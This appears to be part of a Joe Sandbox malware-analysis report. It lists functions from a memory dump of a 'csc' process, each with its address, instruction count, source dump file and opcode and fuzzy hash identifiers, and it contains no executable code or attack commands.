                                                                                                                                                                                                                                                                                  • String ID: Flst
                                                                                                                                                                                                                                                                                  • API String ID: 0-2374792617
                                                                                                                                                                                                                                                                                  • Opcode ID: 6977f507f35f5d91f5fbd7807199c283d3968d5af256c3be6618fb552c37f5ef
                                                                                                                                                                                                                                                                                  • Instruction ID: 72fd83a08dacde6b8d9e0590d3db86adc0ae4c03c7260ec0d174a754808e2a74
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6977f507f35f5d91f5fbd7807199c283d3968d5af256c3be6618fb552c37f5ef
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541DBB1208341DFCB08CF18C188A26FBE5FB89B14F14896EE55ACB341D771CA42CBA1
                                                                                                                                                                                                                                                                                  Function 05CDC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                                                                                                                                                  • Opcode ID: f8df1d5413ac489e50ab4145ebf875d31eb78de22e4ed4bc4d84297921bc8ad3
                                                                                                                                                                                                                                                                                  • Instruction ID: 56a956e6b206ac9465bf3d382fc4d6806894455cbcc0f2b6408488742269be8c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8df1d5413ac489e50ab4145ebf875d31eb78de22e4ed4bc4d84297921bc8ad3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31E376A0451AEFDB16DA58C949E7FFBB5EF80B20F024929EA05E7650D7309E00D7E0
                                                                                                                                                                                                                                                                                  Function 05CE85AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 05CE85DE
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                                                                                                                                                  • Opcode ID: 7c45f096c5ca91df113235ea07918fb0da27ed565e30f0bbdb14e172495c16bd
                                                                                                                                                                                                                                                                                  • Instruction ID: 11f8fdd2f2b817b200e0d0cc98c2b8e9914b5b4d4c8ee623ff9322ecb788cacb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c45f096c5ca91df113235ea07918fb0da27ed565e30f0bbdb14e172495c16bd
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B012B323047009BDA365B55A888E567F7EFF43264F441C29E40307551CF30B980EBA5
                                                                                                                                                                                                                                                                                  Function 05CB717A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fcf07d9b9352650384f6f765b1b3016ec8ad963effff46a0a3f61ddbbf742a99
                                                                                                                                                                                                                                                                                  • Instruction ID: fdf83a2924cf783222850f1d0e36a4c4085719f7978ac03d030f16af66d965de
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcf07d9b9352650384f6f765b1b3016ec8ad963effff46a0a3f61ddbbf742a99
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D427E71A046168FEF19CF59C490ABEB7F6FF88314F148959D852AB380D774E942CBA0
                                                                                                                                                                                                                                                                                  Function 05C8B1E0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ffe43543a600b253727e2321f287789d01a6b98c7b632cd3b4d5afb518741563
                                                                                                                                                                                                                                                                                  • Instruction ID: ff77ae96820f9a5c3212dc2d5d496e0788db60fddd77ab167f1eb350b541b080
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffe43543a600b253727e2321f287789d01a6b98c7b632cd3b4d5afb518741563
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21327E76E00219DBCB14EF99C895BBEBBB6FF44718F180569E806AB350DB359D01CB90
                                                                                                                                                                                                                                                                                  Function 05C72760 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b6c62f46d489290a19c689ac2743005472cb7e860354447e03a6df101af3b82d
                                                                                                                                                                                                                                                                                  • Instruction ID: 959f0cb43edd409c1bf10f1946f42a3188d25bcc9c04e7908f9c95e8d2b0d8d1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c62f46d489290a19c689ac2743005472cb7e860354447e03a6df101af3b82d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9032F074A047588FDB24CF69CA44BBEBBF2FF84304F24499ED4469B684D735A982CB50
                                                                                                                                                                                                                                                                                  Function 05C664F0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 63b8ce7c222c59375a60b018787937aa297c5d348c92f6f8344c82a8c3a0f2f9
                                                                                                                                                                                                                                                                                  • Instruction ID: a676242ec0497042d014a1155099e65620c63faf7b7dab1177a7e69e671a1b93
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b8ce7c222c59375a60b018787937aa297c5d348c92f6f8344c82a8c3a0f2f9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE16B71608341CFC714CF28C0D4A6ABBE2FF89318F158A6DE59597351DB31EA86CB92
                                                                                                                                                                                                                                                                                  Function 05C6D700 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3b37c688b02d897624395c2a5e16d33817123ae53261b3e28337da2966aa9b86
                                                                                                                                                                                                                                                                                  • Instruction ID: 56480751bbdd395b4bd97ec04d7e7a1404d75dc6b9ba93575c103f27ffd6d4ca
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b37c688b02d897624395c2a5e16d33817123ae53261b3e28337da2966aa9b86
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C1D675B042569BDB24CF59C884BAEBBB2BF44714F14CD9DE816AB280D770EA41CBC1
                                                                                                                                                                                                                                                                                  Function 05CA1763 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ffca18ea08acf531c4a1b5a9a544036c44c240d423cb0d2352a867066abf05ec
                                                                                                                                                                                                                                                                                  • Instruction ID: 1e3077e60de9d0a007b71c65f6dbb56ac167c4f85ced369475f527608b68dbed
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffca18ea08acf531c4a1b5a9a544036c44c240d423cb0d2352a867066abf05ec
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECD11575A002099FDB51DF69C984B9ABBF9FF48344F08487AEE09DB216D771D901CBA0
                                                                                                                                                                                                                                                                                  Function 05C637E4 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2dc77cae18e9b1272c9a21d339e7253e4d1c1157f46f9fd13693fb0bc21cead3
                                                                                                                                                                                                                                                                                  • Instruction ID: ffac8183258a3fd0d86b71225c0a3e676348529febebccd38efa1e63d20aaadc
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc77cae18e9b1272c9a21d339e7253e4d1c1157f46f9fd13693fb0bc21cead3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC14AB1A006459FCB15CFA9D984BADBBF5FF48B10F10486EE416AB350D774AA01CF50
                                                                                                                                                                                                                                                                                  Function 05C70445 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                                                                                                                                                                                  • Instruction ID: 2c92bde6889d5395eaea396953bef0eef6560ba6340362115976c8515f1e84b8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2B12531704649AFDB29CB65C8A4BBEBBB6FF84204F144999D952EB680D730DA40CB54
                                                                                                                                                                                                                                                                                  Function 05C8E507 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 1b6a84c912b678e1860d65b74e8b0a1df4764b3b5eb885b961f3fa63d1af1ed2
                                                                                                                                                                                                                                                                                  • Instruction ID: 3e4765d378f7145ac53d56b9be94b5a9bcfa599d6c23f5b8183eaa63fbc4f4d3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b6a84c912b678e1860d65b74e8b0a1df4764b3b5eb885b961f3fa63d1af1ed2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DA10A31F04619AFDB21DB98C848BBEBFAABB05718F050959E911AB290D7749E44C7C1
                                                                                                                                                                                                                                                                                  Function 05D34080 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c37bce9a6cc64aa0f78b6e1aeca991e04d2aa9335d1f992cba107667497d2130
                                                                                                                                                                                                                                                                                  • Instruction ID: 5cddf64c3615caac859cc91ca108a1cb6932f76432d7f348cde6b5fcf2cf5ce2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c37bce9a6cc64aa0f78b6e1aeca991e04d2aa9335d1f992cba107667497d2130
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FA1FF72605601EFCB21DF18C98AF6ABBE9FF48704F40092AF5859B650D378EC41CB91
                                                                                                                                                                                                                                                                                  Function 05D2A6C0 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                                                                                                                                                                                  • Instruction ID: ae49d460a097c9841fb6d9d5655463fb82d405f4655f1568d3c333fd90fc5abd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2819F31A002299FCF18CF99C880AAEB7F3FF94314F14816AD8569B344D7B4E902CB54
                                                                                                                                                                                                                                                                                  Function 05C9E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 98ed33151c0a8ebbab703f3d62b577c5da9b54ce4752557c81981ba8575551ce
                                                                                                                                                                                                                                                                                  • Instruction ID: 9fe28afa478ef5e93c383103f58efcfd0f38467fb98ccbeb6f2eaabf7400e72d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98ed33151c0a8ebbab703f3d62b577c5da9b54ce4752557c81981ba8575551ce
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0814B71A00609AFDB25CFA9C884BEEF7FAFF48354F104829E556A7250DB30AD45DB60
                                                                                                                                                                                                                                                                                  Function 05D2970B Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: d1f4fbb00e05600f09ee4f49fd9d36855cd6b2b1a53901650ac90c181fb58d16
                                                                                                                                                                                                                                                                                  • Instruction ID: 6c51ad334e997d0fe3dbab77d89375974dde9f83fb9b50033ea4095626bc42b2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1f4fbb00e05600f09ee4f49fd9d36855cd6b2b1a53901650ac90c181fb58d16
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3061D670B042299BDB25DF64C8A4BBEB7A6FF94328F18415BE85297280DB30DD81C761
                                                                                                                                                                                                                                                                                  Function 05C7C560 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b45cc1eab32ba87a080a4ac8b1b8b5f9caa27283cd0f357e114bfd4b7ee9c962
                                                                                                                                                                                                                                                                                  • Instruction ID: a9f398de8a2d50233e548c36faebca5aabf188a3bdaa9a3431aedb8d2047efc1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b45cc1eab32ba87a080a4ac8b1b8b5f9caa27283cd0f357e114bfd4b7ee9c962
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F071DEB190462ADBCB25CF59C990BBEBFB1FF49710F14496EE842AB340D7749901CBA4
                                                                                                                                                                                                                                                                                  Function 05C7252B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 303e31ef4672f2b6d804b89f70b77991a669c85fd634e8b6425ffb42e110bbc8
                                                                                                                                                                                                                                                                                  • Instruction ID: 239ba66e280fd64969e09448658f07c4f7ad3606c98815b3ff6ed1b8cb0ae733
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 303e31ef4672f2b6d804b89f70b77991a669c85fd634e8b6425ffb42e110bbc8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F67113357046459FC311DF29C484B2AB7E6FF88700F0489AAE859CB751EB38DA85CBA5
                                                                                                                                                                                                                                                                                  Function 05C67623 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5745db4d38655093e1384be918677364764dfcf0fea9cb8175d273fbb58d7f18
                                                                                                                                                                                                                                                                                  • Instruction ID: ec71ee61ec02f2067f67b4e68256fd55fff270ec92bcef41ff8ebf0446b9d7c5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5745db4d38655093e1384be918677364764dfcf0fea9cb8175d273fbb58d7f18
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30615075B00506AFDB09DF79C484AADFBF6FF48304F248A6AD419A7340DB34AA41CB90
                                                                                                                                                                                                                                                                                  Function 05C677F9 Relevance: .2, Instructions: 164COMMON
